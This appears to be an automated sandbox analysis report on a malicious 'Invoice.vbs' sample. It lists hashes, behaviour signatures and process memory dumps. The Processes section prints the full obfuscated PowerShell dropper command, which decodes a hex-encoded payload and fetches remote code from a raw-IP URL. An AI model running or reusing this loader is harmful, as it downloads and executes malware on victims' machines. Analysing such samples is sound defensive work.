Analysis
-
max time kernel
139s -
max time network
140s -
platform
windows7_x64 -
resource
win7-en -
submitted
07-09-2021 12:37
Static task
static1
Behavioral task
behavioral1
Sample
Invoice.vbs
Resource
win7-en
windows7_x64
0 signatures
0 seconds
General
-
Target
Invoice.vbs
-
Size
2KB
-
MD5
157bd8f697377d2442ac93eda10dec94
-
SHA1
9e5b8e8d2349aaedcc7b93fee831990b1f6b8ad6
-
SHA256
dcd4d3f6173c2283b4ed18fcf810870db068d967b7deb0cc2bcf95db1d3fce11
-
SHA512
d86412ba6b642759af963285815b7f9679e6cff17baa78e6e3fa6b984c80179b334ed010d587649449ee4f643d2103722fe4c4805ee7bde59ac21ab3a14ee9b7
Score
10/10
Malware Config
Extracted
Language
ps1
Deobfuscated
URLs
exe.dropper
http://54.184.87.30/sd-bypass.txt
Signatures
-
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Suspicious behavior: EnumeratesProcesses 1 IoCs
Processes:
powershell.exepid process 1776 powershell.exe -
Suspicious use of AdjustPrivilegeToken 1 IoCs
Processes:
powershell.exedescription pid process Token: SeDebugPrivilege 1776 powershell.exe -
Suspicious use of WriteProcessMemory 3 IoCs
Processes:
WScript.exedescription pid process target process PID 1960 wrote to memory of 1776 1960 WScript.exe powershell.exe PID 1960 wrote to memory of 1776 1960 WScript.exe powershell.exe PID 1960 wrote to memory of 1776 1960 WScript.exe powershell.exe
Processes
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Invoice.vbs"1⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $TRUMP ='http://54XXX184XXX87XXX30/sd-bypassXXXtxt'.Replace('XXX','.');$Shib='2%###%2###20###3d###27###%5###5%###%8###20###%3###%f###%9###%e###7%###2e###57###5%###%6###20###%3###%f###%9###%e###6c###%9###%f###53###%e###5%###27###2e###52###65###70###6c###61###63###65###28###27###%5###5%###%8###20###%3###%f###%9###%e###27###2c###27###6e###%5###27###29###2e###52###65###70###6c###61###63###65###28###27###5%###%6###20###%3###%f###%9###%e###27###2c###27###%5###62###%3###27###29###2e###52###65###70###6c###61###63###65###28###27###%f###53###27###2c###27###65###27###29###3b###2%###%3###%3###20###3d###20###27###%%###%f###53###20###%3###%f###%9###%e###20###%c###53###%f###53###%3###%f###%9###%e###6e###%7###27###2e###52###65###70###6c###61###63###65###28###27###53###20###%3###%f###%9###%e###20###27###2c###27###57###6e###27###29###2e###52###65###70###6c###61###63###65###28###27###53###%f###27###2c###27###6f###61###%%###27###29###2e###52###65###70###6c###61###63###65###28###27###%3###%f###%9###%e###27###2c###27###5%###72###%9###27###29###3b###2%###%1###20###3d###27###%9###60###%5###6f###73###20###%3###%f###%9###%e###60###57###60###%2###5%###%3###20###%3###%f###%9###%e###6a###60###%5###5%###%8###20###%3###%f###%9###%e###20###2%###%2###29###2e###2%###%3###%3###28###2%###5%###52###55###%d###50###29###27###2e###52###65###70###6c###61###63###65###28###27###6f###73###20###%3###%f###%9###%e###27###2c###27###58###28###6e###60###65###27###29###2e###52###65###70###6c###61###63###65###28###27###%2###5%###%3###20###%3###%f###%9###%e###27###2c###27###2d###%f###62###27###29###2e###52###65###70###6c###61###63###65###28###27###5%###%8###20###%3###%f###%9###%e###27###2c###27###60###63###60###5%###27###29###3b###26###28###27###%9###27###2b###27###%5###58###27###29###28###2%###%1###20###2d###%a###6f###69###6e###20###27###27###29###7c###26###28###27###%9###27###2b###27###%5###58###27###29###3b'.Replace('%','4');Invoke-Expression (-join ($Shib -split '###' | ? { $_ } | % { [char][convert]::ToUInt32($_,16) }))2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
Network
MITRE ATT&CK Matrix ATT&CK v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
memory/1776-53-0x0000000000000000-mapping.dmp
-
memory/1776-55-0x000007FEF3120000-0x000007FEF3C7D000-memory.dmpFilesize
11.4MB
-
memory/1776-56-0x0000000002740000-0x0000000002742000-memory.dmpFilesize
8KB
-
memory/1776-57-0x0000000002742000-0x0000000002744000-memory.dmpFilesize
8KB
-
memory/1776-58-0x0000000002744000-0x0000000002747000-memory.dmpFilesize
12KB
-
memory/1776-59-0x000000000274B000-0x000000000276A000-memory.dmpFilesize
124KB
-
memory/1960-52-0x000007FEFBEF1000-0x000007FEFBEF3000-memory.dmpFilesize
8KB